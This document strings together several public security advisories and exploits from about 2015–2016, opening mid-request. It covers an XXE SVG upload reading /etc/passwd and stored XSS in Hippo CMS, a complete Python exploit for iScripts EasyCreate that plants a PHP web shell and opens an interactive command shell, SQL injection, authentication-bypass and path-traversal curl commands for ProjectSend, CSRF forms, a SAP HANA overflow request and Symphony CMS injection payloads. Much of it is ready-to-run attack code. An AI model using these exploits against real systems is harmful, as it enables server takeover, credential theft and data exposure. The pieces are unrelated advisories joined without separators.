Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
Content-Length: 2101
Content-Type: multipart/form-data; boundary=---------------------------20443294602274
Cookie: [OMMITED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------20443294602274
Content-Disposition: form-data; name="id1a0_hf_0"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:1:item:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:2:item:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:1:item:view:1:item:value:widget"
asd
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:2:item:view:1:item:value:widget"
hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:3:item:view:1:item:panel:editor"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:2:item:view:1:item:value:widget"
hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:3:item:view:1:item:value:widget"
hhhh
-----------------------------20443294602274
Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]
><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999
/xlink" version="1.1">&xxe;</svg>
-----------------------------20443294602274--
[Response]:
<?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www
.w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
***
***
***
***
</svg>
###############################################################################
<!--
Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability
Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
Summary: Hippo CMS is an open source Java CMS. We
built it so you can easily integrate it into your
existing architecture.
Desc: Hippo CMS suffers from a stored XSS vulnerability.
Input passed thru the POST parameters 'groupname' and
'description' is not sanitized allowing the attacker to
execute HTML code into user's browser session on the
affected site.
Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5300
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php
Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
04.12.2015
-->
<html>
<body>
<form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
<input type="hidden" name="id26c_hf_0" value="" />
<input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" />
<input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" />
<input type="hidden" name="create-button" value="1" />
<input type="submit" value="Inject code" />
</form>
</body>
</html>
#!C:/Python27/python.exe -u
#
#
# iScripts EasyCreate 3.0 Remote Code Execution Exploit
#
#
# Vendor: iScripts.com
# Product web page: http://www.iscripts.com
# Affected version: 3.0
#
# Summary: iScripts EasyCreate is a private label online website builder. This
# software allows you to start an online business by offering website building
# services to your customers. Equipped with drag and drop design functionality,
# crisp templates and social sharing capabilities, this online website builder
# software will allow you to provide the best website building features to your
# users.
#
# Desc: iScripts EasyCreate suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper verification of
# uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST
# parameter. This can be exploited to execute arbitrary PHP code by uploading
# a malicious PHP script file with '.php4' extension (to bypass the '.htaccess'
# block rule) that will be stored in '/uploads/siteimages/thumb/' directory.
#
# Tested on: Apache
# MySQL 5.5.40
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5297
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5297.php
#
#
# 17.11.2015
#
#
version = '3.0'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
import requests, httplib
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
global file
file = 'abcde2'
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------------------@
| iScripts EasyCreate 3.0 Remote Code Execution Exploit |
| ID: ZSL-2016-5297 |
| Copyleft (c) 2016, Zero Science Lab |
@-------------------------------------------------------------@
'''
if len(sys.argv) < 1:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
opener2.open('http://'+host+'/easycreate/demo/login.php')
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'vuser_login' : username,
'vuser_password' : password,
})
login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
auth = login.read()
if re.search(r'Invalid username and', auth):
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
output = response.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, field_name, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((field_name, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: application/x-msdownload',
'',
body,
]
for field_name, filename, content_type, body in self.files
)
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_file('userImages', 'abcde2.php4',
fileHandle=StringIO('<?php system(\$_GET[\\\'cmd\\\']); ?>'))
request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
request.add_header('Accept-Language', 'en-US,en;q=0.5')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Connection', 'keep-alive')
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
request.add_header('Accept-Encoding', 'gzip, deflate')
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
output = response.read()
for line in output.splitlines():
if file in line:
filename = str(line.split("=")[2:])[3:84]
print filename
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener2.open(filename+'cmd='+cmd)
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()
iScripts EasyCreate 3.0 Multiple Vulnerabilities
[Vendor Product Description]
- iScripts EasyCreate is a private label online website builder. This software allows you to start an
online business by offering website building services to your customers. Equipped with drag and drop
design functionality, crisp templates and social sharing capabilities, this online website builder
software will allow you to provide the best website building features to your users.
- Site: http://www.iscripts.com
[Advisory Timeline]
[17.11.2015] First contact to vendor.
[08.12.2015] Follow up with vendor. No response received.
[08.12.2015] Ticket Created using online portal (id #010248399110346).
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
[28.12.2015] Vendor responds asking more details.
[29.12.2015] Sent details to the vendor.
[05.01.2016] Follow up with vendor. No response received.
[14.01.2016] Follow up with vendor. No response received.
[28.01.2016] Public Security advisory released.
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Stored)
- Cross Site Scripting (Reflected)
- Cross Site Request Forgery
[Impact]
- High
[Affected Version]
- EasyCreate 3.0
[Advisory]
- ZSL-2016-5298
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
[Bug Description and Proof of Concept]
1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious web site
https://en.wikipedia.org/wiki/Cross-site_request_forgery
2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
triggered when input passed via multiple parameters is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting
3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerability. Input passed via a GET
parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.
https://en.wikipedia.org/wiki/SQL_injection
[Proof-of-Concept]
1. SQL Injection
Parameter:
siteid (GET)
Payload:
action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Multiple Stored Cross Site Scripting
Parameter:
siteName (POST)
Payload:
Content-Disposition: form-data; name="siteName"
<script>alert(1)</script>
Parameter:
selectedimage (POST)
Payload:
selectedimage=<script>alert(1)</script>
Parameter:
filename (POST)
Payload:
filename=<script>alert(1)</script>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. Multiple Reflected Cross Site Scripting
Parameter
catid (GET)
Parameters
selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for editing profile:
<html>
<body>
<form action="http://localhost/easycreate/demo/editprofile.php?act=post" method="POST">
<input type="hidden" name="vuser_login" value="user" />
<input type="hidden" name="vuser_name" value="Demo User" />
<input type="hidden" name="vuser_lastname" value="PWNED" />
<input type="hidden" name="vuser_email" value="demo@demo.com" />
<input type="hidden" name="vuser_address1" value="a" />
<input type="hidden" name="vcity" value="" />
<input type="hidden" name="vstate" value="" />
<input type="hidden" name="vcountry" value="United States" />
<input type="hidden" name="vzip" value="" />
<input type="hidden" name="vuser_phone" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
Advisory ID: SGMA-16001
Title: ProjectSend multiple vulnerabilities
Product: ProjectSend (previously cFTP)
Version: r582 and probably prior
Vendor: www.projectsend.org
Vulnerability type: SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
Risk level: 4 / 5
Credit: filippo.cavallarin@wearesegment.com
CVE: N/A
Vendor notification: 2015-11-05
Vendor fix: N/A
Public disclosure: 2016-01-29
ProjectSend (previously cFTP) suffers from multiple vulnerabilities:
- SQL Injection
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
The following proof-of-concept demostrates this issue by downloading login credentials of registered users:
curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"
- SQL Injection
The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:
curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'
- SQL Injection
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.
$selected_clients = $_POST['selected_clients'];
$clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
$sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");
- SQL Injection
The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.
$status_filter = $_POST['status'];
$cq .= " AND active='$status_filter'";
[...]
$sql = $database->query($cq);
- SQL Injection
The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a sql query without beeing properly sanitized.
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
$files_to_zip = explode(',',substr($_GET['file'], 0, -1));
[...]
foreach ($files_to_zip as $file_to_zip) {
[...]
$sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');
- SQL Injection
The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a sql query without beeing properly sanitized.
There is no POC available, but the vulnerability is easy to spot by looking at the source code.
$log_action = $_GET['action'];
$log_query = "SELECT * FROM tbl_actions_log";
if (!empty($log_action)) {
$log_query .= " WHERE action = '$log_action'";
- Authentication Bypass
An Authenticaton Bypass vulnerability has been discovered in multiple pages. By adding a cookie to request it is possible to bypass certain authentication checks and gain access to protected resources.
The following proof-of-concepts are available:
Lists all registered users:
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'
Add an Admin user to the database:
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'
Read file statsictics:
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'
Read file details:
curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'
Bypass authentication:
curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'
- Arbitrary File Download
The page process-zip-download.php fails to restrict access to local files. By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
By combining this vulnerability with the Authentication Bypass affecting the same file, is possible for a non-authenticated user to gain access to protected data.
The followinf proof-of-concept is available.
curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
- Insecure Direct Object References
The page actions.log.export.php fails to perform authentication checks so it's possible for anyone to access logs data.
The followinf proof-of-concept is available.
curl http://projectsend.local/includes/actions.log.export.php
Solution
No solution is available at the time of writing.
The vendor has been contacted about three months before the public disclosure, but he stopped responding after we sent him our report.
References
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
http://www.projectsend.org
Filippo Cavallarin
https://wearesegment.com
########################################################################
# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
# Date: 2016/29/01
# Exploit Author: ALIREZA_PROMIS
# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
# Version: 1.6
# Tested on: ubuntu / FireFox
########################################################################
[Exploitation]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[HTML CODE ]
<form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php"
<select name="postorpage">
<option value="page">Page</option>
<option value="post">Post</option>
</select>
<td colspan="2"><select name='post_parent' id='post_parent'>
<option value="">No, do not use parent</option>
<option class="level-0" value="2">Sample Page</option>
</select>
<tr class="alternate iedit">
<textarea name="titles" rows="1" cols="30"></textarea>
<tr class="iedit">
<td colspan="2"><select name="author_id">
<option value="1">admin</option></select>
<input type="submit" name="submitbutton" value="Add" class="button-primary"></form>
and live POST request :
postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add
########################################################################
# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
#
# [+] fb.com/alirezapomis.blackhat
########################################################################
[ERPSCAN-15-024] SAP HANA hdbindexserver - Memory corruption
Application: SAP HANA
Versions Affected: SAP HANA 1.00.095
Vendor URL: http://SAP.com
Bugs: Memory corruption, RCE
Reported: 17.07.2015
Vendor response: 18.07.2015
Date of Public Advisory: 13.10.2015
Reference: SAP Security Note 2197428
Author: Mathieu Geli (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP HANA 1.00.095
Advisory ID: [ERPSCAN-15-024]
Risk: Hight
Advisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/
Date published: 13.10.2015
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Memory corruption, RCE
Impact: full system compromise
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-7986
CVSS Information
CVSS Base Score: 9.3 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range)
Network (N)
AC : Access Complexity (Required attack complexity) Medium (M)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality
Complete (C)
I : Impact to Integrity
Complete (C)
A : Impact to Availability
Complete (C)
3. VULNERABILITY DESCRIPTION
A buffer overflow vulnerability exists in SAP HANA interface. If an
attacker has a network access to the SQL interface or the SAP HANA
Extended Application Services interface of an SAP HANA system, the
vulnerability enables the attacker to inject code into the working
memory that is subsequently executed by the application. It can also
be used to cause a general fault in the product causing the product to
terminate.
Proof of concept
This authentication request should be replayed 10 times.
curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H
'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H
'X-csrf-token: unsafe' -d
'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
4. VULNERABLE PACKAGES
SAP HANA 1.00.095.00
Other versions are probably affected too, but they were not checked.
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2197428
6. AUTHOR
Mathieu Geli (ERPScan)
7. TECHNICAL DESCRIPTION
An anonymous attacker can use a special HTTP request to corrupt SAP
HANA index server memory.
8. REPORT TIMELINE
Send: 17.07.2015
Reported: 17.07.2015
Vendor response: 18.07.2015
Date of Public Advisory: 13.10.2015
9. REFERENCES
http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/
10. ABOUT ERPScan Research
The company’s expertise is based on the research subdivision of
ERPScan, which is engaged in vulnerability research and analysis of
critical enterprise applications. It has achieved multiple
acknowledgments from the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud to have exposed new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
nominated for the best server-side vulnerability at BlackHat 2013.
ERPScan experts have been invited to speak, present, and train at 60+
prime international security conferences in 25+ countries across the
continents. These include BlackHat, RSA, HITB, and private SAP
trainings in several Fortune 2000 companies.
ERPScan researchers lead the project EAS-SEC, which is focused on
enterprise application security research and awareness. They have
published 3 exhaustive annual award-winning surveys about SAP
security.
ERPScan experts have been interviewed by leading media resources and
featured in specialized info-sec publications worldwide. These include
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
Heise, and Chinabyte, to name a few.
We have highly qualified experts in staff with experience in many
different fields of security, from web applications and
mobile/embedded to reverse engineering and ICS/SCADA systems,
accumulating their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Security provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial and Retail organizations to
secure their mission-critical processes. Named as an ‘Emerging Vendor’
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
distinguished by 30+ other awards, ERPScan is the leading SAP SE
partner in discovering and resolving security vulnerabilities. ERPScan
consultants work with SAP SE in Walldorf to assist in improving the
security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions to evaluate and secure SAP
and Oracle ERP systems and business-critical applications from both,
cyber-attacks as well as internal fraud. Usually our clients are large
enterprises, Fortune 2000 companies and managed service providers
whose requirements are to actively monitor and manage security of vast
SAP landscapes on a global scale.
We ‘follow the sun’ and function in two hubs, located in the Palo Alto
and Amsterdam to provide threat intelligence services, agile support
and operate local offices and partner network spanning 20+ countries
around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
================================================================
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
================================================================
Information
================================================================
Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version:Symphony CMS 2.6.3
Fixed Version :Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)
Description
================================================================
The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.
Proof of Concept
================================================================
*1. fields[username] (POST)*
Parameter: fields[username] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
OR 7462=7462#&fields[user_type]=author&fields[password]=sach
in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
rea]=3&action[save]=Create Author
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
*2. fields[email] (POST)*
Parameter: fields[email] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND 4852=4852 AND
'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND (SELECT 8298 FROM(SELECT
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
'hKvH'='hKvH&fields[user
ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
*3. action[save] (POST)*
Parameter: action[save] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@mail.com
&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author%' AND 8836=8836 AND '%'='
---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0
================================================================
Vulnerable Product:
[+]
Symphony CMS 2.6.3
Vulnerable Parameter(s):
[+]fields[username] (POST)
